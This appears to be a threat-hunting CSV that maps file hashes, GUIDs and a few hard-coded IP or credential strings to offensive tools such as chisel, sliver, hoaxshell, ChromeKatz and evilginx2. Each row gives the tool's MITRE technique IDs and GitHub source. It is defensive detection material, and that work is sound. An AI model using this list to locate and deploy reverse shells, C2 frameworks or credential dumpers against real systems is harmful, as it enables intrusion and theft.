"*1617117C-0E94-4E6A-922C-836D616EC1F5*",".{0,1000}1617117C\-0E94\-4E6A\-922C\-836D616EC1F5.{0,1000}","offensive_tool_keyword","Shellcode-Hide","simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket)","T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - 
T1105","TA0005 - TA0001 - TA0003","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/Shellcode-Hide","1","0","N/A","9","4","350","93","2023-08-02T02:22:20Z","2023-02-05T17:31:43Z" "*161fd76c83e557269bee39a57baa2ccbbac679f59d9adff1e1b73b0f4bb277a6*",".{0,1000}161fd76c83e557269bee39a57baa2ccbbac679f59d9adff1e1b73b0f4bb277a6.{0,1000}","offensive_tool_keyword","reverse-ssh","Statically-linked ssh server with reverse shell functionality for CTFs and such","T1105 - T1572 - T1569.002 - T1090","TA0001 - TA0002 - TA0003 - TA0010 - TA0011 - TA0005 ","N/A","N/A","C2","https://github.com/Fahrj/reverse-ssh","1","0","N/A","10","10","875","126","2023-02-15T00:16:25Z","2021-07-12T18:26:29Z" "*1637c5d66df6ce383aee2ab51e305ae9b654cfb4ceb21cf09d5123a54d7d7b7d*",".{0,1000}1637c5d66df6ce383aee2ab51e305ae9b654cfb4ceb21cf09d5123a54d7d7b7d.{0,1000}","offensive_tool_keyword","SCOMDecrypt","SCOMDecrypt is a tool to decrypt stored RunAs credentials from SCOM servers","T1552.001 - T1003","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/nccgroup/SCOMDecrypt","1","0","N/A","10","2","113","21","2023-11-10T07:04:26Z","2017-02-21T16:15:11Z" "*16461494c864ffe95bb32a01a8db0aa7d46e9db9d6fa0546fdaf75044eb299fa*",".{0,1000}16461494c864ffe95bb32a01a8db0aa7d46e9db9d6fa0546fdaf75044eb299fa.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*1659E645-27B0-4AB9-A10E-64BA4B801CB0*",".{0,1000}1659E645\-27B0\-4AB9\-A10E\-64BA4B801CB0.{0,1000}","offensive_tool_keyword","OSEP-Code-Snippets","notable code snippets for Offensive Security's PEN-300 (OSEP) course","T1116 - T1204.002 - T1027.009 - T1021.005 - T1560.001 - T1100 - T1003.001 - T1564.001 - T1047 - T1210 - T1134.002 - T1055 - T1055.011 - T1055.012 - T1204","TA0005 - TA0040 - TA0008 - TA0003 - TA0006 - TA0004","N/A","N/A","Exploitation tools","https://github.com/chvancooten/OSEP-Code-Snippets","1","0","N/A","8","10","N/A","N/A","N/A","N/A" "*169158f7ab05b90fd880b4921decbbe9ff0b13d04592b4711cdcb07216f2d02a*",".{0,1000}169158f7ab05b90fd880b4921decbbe9ff0b13d04592b4711cdcb07216f2d02a.{0,1000}","offensive_tool_keyword","hoaxshell","An unconventional Windows reverse shell. currently undetected by Microsoft Defender and various other AV solutions. 
solely based on http(s) traffic","T1059 - T1071 - T1071.001 - T1203","TA0002 - TA0011","N/A","N/A","C2","https://github.com/t3l3machus/hoaxshell","1","0","N/A","N/A","10","2888","463","2024-03-29T12:50:55Z","2022-07-10T15:36:24Z" "*16bef09e16119f1754a6b4283e93ff7a17cfdd7c043c3ff05a3d41f128ead52e*",".{0,1000}16bef09e16119f1754a6b4283e93ff7a17cfdd7c043c3ff05a3d41f128ead52e.{0,1000}","offensive_tool_keyword","fscan","Vulnerability scanner","T1595","TA0042 - TA0007","N/A","N/A","Reconnaissance","https://github.com/shadow1ng/fscan","1","0","file_hash","8","10","7984","1339","2024-04-19T07:11:03Z","2020-11-13T16:35:20Z" "*16e75a6be0f951622988cb5c7875151c9d4638e595a91c43be7a35d4d4f2cd50*",".{0,1000}16e75a6be0f951622988cb5c7875151c9d4638e595a91c43be7a35d4d4f2cd50.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*16e9f3c3f2a4264e3be9d2ddfe8d4ad409f4db17c077efd372389fbfe89f727b*",".{0,1000}16e9f3c3f2a4264e3be9d2ddfe8d4ad409f4db17c077efd372389fbfe89f727b.{0,1000}","offensive_tool_keyword","ADCollector","ADCollector is a lightweight tool that enumerates the Active Directory environment","T1087 - T1018 - T1069 - T1482","TA0007 - TA0003 - TA0004","N/A","N/A","Discovery","https://github.com/dev-2null/ADCollector","1","0","N/A","7","7","619","83","2022-07-30T05:27:15Z","2019-05-15T06:42:20Z" 
"*17179c8931a5dc7a470485097f4a8f35fcf55bc4fa57d34c865ab76cd382ca74*",".{0,1000}17179c8931a5dc7a470485097f4a8f35fcf55bc4fa57d34c865ab76cd382ca74.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*171A9A71-EDEF-4891-9828-44434A00585E*",".{0,1000}171A9A71\-EDEF\-4891\-9828\-44434A00585E.{0,1000}","offensive_tool_keyword","VectorKernel","PoCs for Kernelmode rootkit techniques research.","T1543 - T1055 - T1134 - T1564 - T1070 - T1057 - T1574 - T1562 - T1082 - T1518","TA0003 - TA0005 - TA0004 - TA0008 - TA0007","N/A","N/A","Exploitation tools","https://github.com/daem0nc0re/VectorKernel/","1","0","N/A","10","3","291","39","2024-04-24T09:46:46Z","2023-11-23T12:36:31Z" "*17257046150e6cbdc59be7873210cc6e0399ba51a5da24114f3c147bdc4fdb4c*",".{0,1000}17257046150e6cbdc59be7873210cc6e0399ba51a5da24114f3c147bdc4fdb4c.{0,1000}","offensive_tool_keyword","nimproxydll","A Docker container for byt3bl33d3r/NimDllSideload - DLL sideloading/proxying","T1574.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/cyllective/nimproxydll","1","0","N/A","9","1","11","0","2024-03-22T10:29:56Z","2024-03-15T15:15:45Z" "*17395a3b51f21d23c817cb84d56e915026fbf18fb34fc74c8b0377cd0e12ef94*",".{0,1000}17395a3b51f21d23c817cb84d56e915026fbf18fb34fc74c8b0377cd0e12ef94.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds 
of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*173fddaeb3faa3256a8a6606775eb319ef5d70082f3b7c5ffab9d004b66b1c0d*",".{0,1000}173fddaeb3faa3256a8a6606775eb319ef5d70082f3b7c5ffab9d004b66b1c0d.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*1753bd59904f52ea9be59524942fc98321472c6a91c7af8051ab397edee32e6a*",".{0,1000}1753bd59904f52ea9be59524942fc98321472c6a91c7af8051ab397edee32e6a.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tools","https://github.com/Orange-Cyberdefense/arsenal","1","0","commands cheat sheets","8","10","N/A","N/A","N/A","N/A" 
"*176711b9ba9b2e01fbd5ad4ad2770d82985caffc02f70d4aa7585fe44508fbd3*",".{0,1000}176711b9ba9b2e01fbd5ad4ad2770d82985caffc02f70d4aa7585fe44508fbd3.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","can also be used by blueteam as a honeypot","10","10","1434","239","2024-02-28T06:08:59Z","2018-09-07T19:17:41Z" "*17942ccf0a175f0f4d58db7bc010d0c19c18250e1b634f2aba8d91ba6339d829*",".{0,1000}17942ccf0a175f0f4d58db7bc010d0c19c18250e1b634f2aba8d91ba6339d829.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*179c7bc7caed085cdfd1db94e54b75dabb2a8943430be82f590143f2b4303b5d*",".{0,1000}179c7bc7caed085cdfd1db94e54b75dabb2a8943430be82f590143f2b4303b5d.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*179fff5afdfa8e25f3027ed01a226cb8f0b6ebee516ea2fb8f4e6e226235fe61*",".{0,1000}179fff5afdfa8e25f3027ed01a226cb8f0b6ebee516ea2fb8f4e6e226235fe61.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*17a1d963e1565ecff5794a685188f34adc40bc12b4f31aa32db53b6956369827*",".{0,1000}17a1d963e1565ecff5794a685188f34adc40bc12b4f31aa32db53b6956369827.{0,1000}","offensive_tool_keyword","ChromeKatz","Dump cookies directly from Chrome process memory","T1555.003 - T1003","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Meckazin/ChromeKatz","1","0","N/A","10","4","318","28","2024-04-23T18:29:17Z","2023-12-07T22:27:06Z" "*17a96dd3f358c5b165d40422c6e218c1b3e9d27182e5202b8d0ad611a874c6d8*",".{0,1000}17a96dd3f358c5b165d40422c6e218c1b3e9d27182e5202b8d0ad611a874c6d8.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*17d97bd15502bc16353e7e06822578069c1e653b031fb4ac982d8cea9d31026f*",".{0,1000}17d97bd15502bc16353e7e06822578069c1e653b031fb4ac982d8cea9d31026f.{0,1000}","offensive_tool_keyword","brutespray","BruteSpray takes nmap GNMAP/XML output or newline seperated JSONS and automatically brute-forces services with default credentials using Medusa. BruteSpray can even find non-standard ports by using the -sV inside Nmap.","T1110","TA0001 - TA0043","N/A","N/A","Credential Access","https://github.com/x90skysn3k/brutespray","1","0","N/A","10","10","1922","376","2024-04-30T13:32:24Z","2017-04-05T17:05:10Z" "*17ed9f14af38a0b8442ea9306ba6746746a3d18c2a45ff1647603a95bd4425c8*",".{0,1000}17ed9f14af38a0b8442ea9306ba6746746a3d18c2a45ff1647603a95bd4425c8.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*181de17b8aa7917df5d9e610cf2b183d92d84ec9fe4b809303842bd47022e49c*",".{0,1000}181de17b8aa7917df5d9e610cf2b183d92d84ec9fe4b809303842bd47022e49c.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - 
TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*1827f84465eaa41ba584561ae108be14e693ba4c992e9d58ef0148959cc9efc1*",".{0,1000}1827f84465eaa41ba584561ae108be14e693ba4c992e9d58ef0148959cc9efc1.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0002 - TA0003 - TA0008","N/A","N/A","Sniffing & Spoofing","https://github.com/An0nUD4Y/evilginx2","1","0","file_hash","10","1","69","16","2024-04-24T19:24:31Z","2020-07-10T06:01:11Z" "*182e514745c25c47038513979fa80e3744d792f121089cffce1f5de3c5799202*",".{0,1000}182e514745c25c47038513979fa80e3744d792f121089cffce1f5de3c5799202.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*184c81c9d2a54ae16baadb6f6523e4ae2060c6570682a721f3d977dccfd68a64*",".{0,1000}184c81c9d2a54ae16baadb6f6523e4ae2060c6570682a721f3d977dccfd68a64.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" 
"*1868f166b2b622a3fd8bcb7003527e32700d222d5a8275da4479d04ec991e54c*",".{0,1000}1868f166b2b622a3fd8bcb7003527e32700d222d5a8275da4479d04ec991e54c.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*189219A1-9A2A-4B09-8F69-6207E9996F94*",".{0,1000}189219A1\-9A2A\-4B09\-8F69\-6207E9996F94.{0,1000}","offensive_tool_keyword","OSEP-Code-Snippets","notable code snippets for Offensive Security's PEN-300 (OSEP) course","T1116 - T1204.002 - T1027.009 - T1021.005 - T1560.001 - T1100 - T1003.001 - T1564.001 - T1047 - T1210 - T1134.002 - T1055 - T1055.011 - T1055.012 - T1204","TA0005 - TA0040 - TA0008 - TA0003 - TA0006 - TA0004","N/A","N/A","Exploitation tools","https://github.com/chvancooten/OSEP-Code-Snippets","1","0","N/A","8","10","N/A","N/A","N/A","N/A" "*189f1c8815a6add9af140e74c2a8ed875e1d2187c42de7180aa99030d2002482*",".{0,1000}189f1c8815a6add9af140e74c2a8ed875e1d2187c42de7180aa99030d2002482.{0,1000}","offensive_tool_keyword","gosecretsdump","Dump ntds.dit really fast","T1003","TA0006","N/A","N/A","Credential Access","https://github.com/C-Sto/gosecretsdump","1","0","N/A","10","4","354","48","2021-10-01T09:11:33Z","2018-12-24T05:54:19Z" "*18A66118-B98D-4FFC-AABE-DAFF5779F14C*",".{0,1000}18A66118\-B98D\-4FFC\-AABE\-DAFF5779F14C.{0,1000}","offensive_tool_keyword","Invisi-Shell","Hide your powershell script in plain sight! Invisi-Shell bypasses all of Powershell security features (ScriptBlock logging. Module logging. Transcription. AMSI) by hooking .Net assemblies. 
The hook is performed via CLR Profiler API.","T1027 - T1059.001 - T1562","TA0005 - TA0002?","N/A","N/A","Defense Evasion","https://github.com/OmerYa/Invisi-Shell","1","0","N/A","10","10","1024","151","2019-08-19T19:55:19Z","2018-10-14T23:32:56Z" "*18c0331dcef2f8c9772d3581efcb54f2178ad7f48ee0a1839c987033cba5148b*",".{0,1000}18c0331dcef2f8c9772d3581efcb54f2178ad7f48ee0a1839c987033cba5148b.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*18C681A2-072F-49D5-9DE6-74C979EAE08B*",".{0,1000}18C681A2\-072F\-49D5\-9DE6\-74C979EAE08B.{0,1000}","offensive_tool_keyword","ForkPlayground","proof-of-concept of Process Forking.","T1055 - T1003","TA0001 - TA0005","N/A","N/A","Defense Evasion","https://github.com/D4stiny/ForkPlayground","1","0","N/A","7","3","214","33","2021-11-29T21:42:43Z","2021-11-26T04:21:46Z" "*18cc8188bbdd5cfa13840e0cd62c447979d860cd6366c5abe17be70ff4be5a24*",".{0,1000}18cc8188bbdd5cfa13840e0cd62c447979d860cd6366c5abe17be70ff4be5a24.{0,1000}","offensive_tool_keyword","reverse-ssh","Statically-linked ssh server with reverse shell functionality for CTFs and such","T1105 - T1572 - T1569.002 - T1090","TA0001 - TA0002 - TA0003 - TA0010 - TA0011 - TA0005 ","N/A","N/A","C2","https://github.com/Fahrj/reverse-ssh","1","0","N/A","10","10","875","126","2023-02-15T00:16:25Z","2021-07-12T18:26:29Z" "*18df81cab86972d172750f478678ab9bd41fe6c5a7df21d2d50d06bad60278ed*",".{0,1000}18df81cab86972d172750f478678ab9bd41fe6c5a7df21d2d50d06bad60278ed.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" 
"*18eeee347539926baae88b3bec52025a00b404301f60a8cbf4d77156fcfaf782*",".{0,1000}18eeee347539926baae88b3bec52025a00b404301f60a8cbf4d77156fcfaf782.{0,1000}","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","8130","1799","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z" "*1902a53e45aa1a58bca4bd3014df8cf8a2cea4fa312b5fddb44be0ff46900181*",".{0,1000}1902a53e45aa1a58bca4bd3014df8cf8a2cea4fa312b5fddb44be0ff46900181.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*1914b76bcb69681a6d7d6b6e0e98793f244073bdbf92e2b7f7d74e11584accbf*",".{0,1000}1914b76bcb69681a6d7d6b6e0e98793f244073bdbf92e2b7f7d74e11584accbf.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - 
TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*19188a4c5110709fe0277421eab563bf4d738cdd3766a440e76ff00cd653dc88*",".{0,1000}19188a4c5110709fe0277421eab563bf4d738cdd3766a440e76ff00cd653dc88.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*192.168.0.110:1234*",".{0,1000}192\.168\.0\.110\:1234.{0,1000}","offensive_tool_keyword","C2_Server","C2 server to connect to a victim machine via reverse shell","T1090 - T1090.001 - T1071 - T1071.001","TA0011 ","N/A","N/A","C2","https://github.com/reveng007/C2_Server","1","1","N/A","10","10","44","16","2022-02-27T02:00:02Z","2021-03-05T12:35:45Z" "*192.168.1.229 Passw0rd!*",".{0,1000}192\.168\.1\.229\sPassw0rd!.{0,1000}","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","0","N/A","10","10","339","47","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" "*1920ded3be0d3f44df039d4ccd7597ecdc62d7b994364ad25f3021e5c9428731*",".{0,1000}1920ded3be0d3f44df039d4ccd7597ecdc62d7b994364ad25f3021e5c9428731.{0,1000}","offensive_tool_keyword","reverse-ssh","Statically-linked ssh server with reverse shell functionality for CTFs and such","T1105 - T1572 - T1569.002 - T1090","TA0001 - TA0002 - TA0003 - TA0010 - TA0011 - TA0005 ","N/A","N/A","C2","https://github.com/Fahrj/reverse-ssh","1","0","N/A","10","10","875","126","2023-02-15T00:16:25Z","2021-07-12T18:26:29Z" 
"*193d4af4e5b7459ad252eb2484692dcc30f2f57bd3e6e8078c144229ba4ceafa*",".{0,1000}193d4af4e5b7459ad252eb2484692dcc30f2f57bd3e6e8078c144229ba4ceafa.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*197f8806b3b467c66ad64b187f831f10ddd71695d61a42344ae617ee62e62faa*",".{0,1000}197f8806b3b467c66ad64b187f831f10ddd71695d61a42344ae617ee62e62faa.{0,1000}","offensive_tool_keyword","NTLMInjector","restore the user password after a password reset (get the previous hash with DCSync)","T1555 - T1556.003 - T1078 - T1110.003 - T1201 - T1003","TA0001 - TA0003 - TA0004 - TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/vletoux/NTLMInjector","1","0","N/A","10","2","164","29","2017-06-08T19:01:21Z","2017-06-04T07:25:36Z" "*198a1a3d69ff345e90ee64c3b437c7face55537cbe18b40506d54f5c489bca68*",".{0,1000}198a1a3d69ff345e90ee64c3b437c7face55537cbe18b40506d54f5c489bca68.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","can also be used by blueteam as a honeypot","10","10","1434","239","2024-02-28T06:08:59Z","2018-09-07T19:17:41Z" 
"*198dc4828f294ed26c63eaf2c0d38e2d7a21db41fe31ce988d9139ea2245f0ea*",".{0,1000}198dc4828f294ed26c63eaf2c0d38e2d7a21db41fe31ce988d9139ea2245f0ea.{0,1000}","offensive_tool_keyword","gosecretsdump","Dump ntds.dit really fast","T1003","TA0006","N/A","N/A","Credential Access","https://github.com/C-Sto/gosecretsdump","1","0","N/A","10","4","354","48","2021-10-01T09:11:33Z","2018-12-24T05:54:19Z" "*199c57a85711459c0b0fbc8883b19829cec8c64588f50bb4a6b2611f6ad4d62b*",".{0,1000}199c57a85711459c0b0fbc8883b19829cec8c64588f50bb4a6b2611f6ad4d62b.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" 